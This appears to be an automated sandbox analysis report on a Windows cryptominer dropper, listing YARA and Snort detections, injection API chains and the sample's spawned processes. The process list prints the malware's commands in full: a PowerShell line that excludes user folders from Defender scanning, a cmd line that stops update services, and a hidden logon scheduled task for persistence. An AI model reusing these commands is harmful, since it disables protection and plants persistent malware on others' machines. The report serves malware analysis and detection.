Source: Yara match; File source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000001F.00000002.617274824.00007FF652E22000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.617274824.00007FF652ABC000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPED
Source: file.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\winlogon.exe; Code function: 14_2_00000268A5BBBE3C FindFirstFileExW
Source: C:\Windows\System32\winlogon.exe; Code function: 14_2_00000268A5C1BE3C FindFirstFileExW
Source: C:\Windows\System32\lsass.exe; Code function: 15_2_000001F89C03BE3C FindFirstFileExW

Networking

Source: Traffic; Snort IDS: 2035420 ET TROJAN Win32/Pripyat Activity (POST) 192.168.2.6:49711 -> 188.165.24.131:80
Source: Traffic; Snort IDS: 2011341 ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection 192.168.2.6:49711 -> 188.165.24.131:80
Source: Traffic; Snort IDS: 2035420 ET TROJAN Win32/Pripyat Activity (POST) 192.168.2.6:49713 -> 188.165.24.131:80
Source: Traffic; Snort IDS: 2011341 ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection 192.168.2.6:49713 -> 188.165.24.131:80
Source: powershell.exe, 0000000C.00000002.572278979.000002BB4CF18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.527103486.000002BB4CF0E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.544110092.000002BB34B81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.573322482.000002BB4D076000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.micro.com/pki/certs/MicRooCerAut_2010-06-23.crt0
Source: powershell.exe, 0000000C.00000002.573322482.000002BB4D076000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000000C.00000003.539682718.000002BB4D166000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.cok
Source: powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000003.516711520.000002BB36805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB369C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB368D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB3690E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.521657211.000002BB3625E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPE; Matched rule: Detects Monero mining software; Author: Florian Roth (Nextron Systems)
Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPE; Matched rule: Detects Monero Crypto Coin Miner; Author: Florian Roth (Nextron Systems)
Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPE; Matched rule: Detects coinmining malware; Author: ditekSHen
Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPE; Matched rule: MacOS_Cryptominer_Xmrig_241780a1; Author: unknown
Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Monero mining software; Author: Florian Roth (Nextron Systems)
Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Monero Crypto Coin Miner; Author: Florian Roth (Nextron Systems)
Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects coinmining malware; Author: ditekSHen
Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPE; Matched rule: MacOS_Cryptominer_Xmrig_241780a1; Author: unknown
Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPE; Matched rule: Detects Monero mining software; Author: Florian Roth (Nextron Systems)
Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPE; Matched rule: Detects Monero Crypto Coin Miner; Author: Florian Roth (Nextron Systems)
Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPE; Matched rule: Detects coinmining malware; Author: ditekSHen
Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPE; Matched rule: MacOS_Cryptominer_Xmrig_241780a1; Author: unknown
Source: 0000001F.00000002.617274824.00007FF652E22000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY; Matched rule: MacOS_Cryptominer_Xmrig_241780a1; Author: unknown
Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPED; Matched rule: Detects Monero mining software; Author: Florian Roth (Nextron Systems)
Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPED; Matched rule: Detects Monero Crypto Coin Miner; Author: Florian Roth (Nextron Systems)
Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPED; Matched rule: Detects coinmining malware; Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPED; Matched rule: MacOS_Cryptominer_Xmrig_241780a1; Author: unknown
Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPE; Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPE; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPE; Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPE; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPE; Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPE; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001F.00000002.617274824.00007FF652E22000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys, type: DROPPED; Matched rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n date = 2023-05-19, author = Florian Roth, description = Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, score = , reference = https://github.com/magicsword-io/LOLDrivers, hash = a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\System32\wbem\WMIADAP.exe | File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD14E4
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD2328
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD1DB4
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD26E8
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5A5F2F8
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5A61658
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5A5B23C
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5A520DC
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5A5B030
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BBFEF8
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BC2258
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BBBE3C
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BB2CDC
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BBBC30
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BEF2F8
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BF1658
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BEB23C
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BE20DC
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BEB030
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5C1FEF8
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5C1BE3C
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5C22258
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5C12CDC
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5C1BC30
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C00F2F8
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C00B030
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C0020DC
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C00B23C
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C011658
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C03FEF8
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C03BC30
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C032CDC
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C03BE3C
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C042258
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,FindCloseChangeNotification,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BB2A7C NtEnumerateValueKey,NtEnumerateValueKey,
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C0321CC NtQuerySystemInformation,StrCmpNIW,
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
Source: file.exe | Static PE information: invalid certificate
Source: file.exe | Static PE information: Number of sections : 11 > 10
Source: dxpserver.exe.0.dr | Static PE information: Number of sections : 11 > 10
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp 78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
Source: file.exe | ReversingLabs: Detection: 40%
Source: file.exe | Virustotal: Detection: 35%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iejbryoj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\lsass.exe | Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\svchost.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iejbryoj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Desktop\file.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\svchost.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp
Source: classification engine | Classification label: mal100.troj.evad.mine.winEXE@44/68@0/0
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD1AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
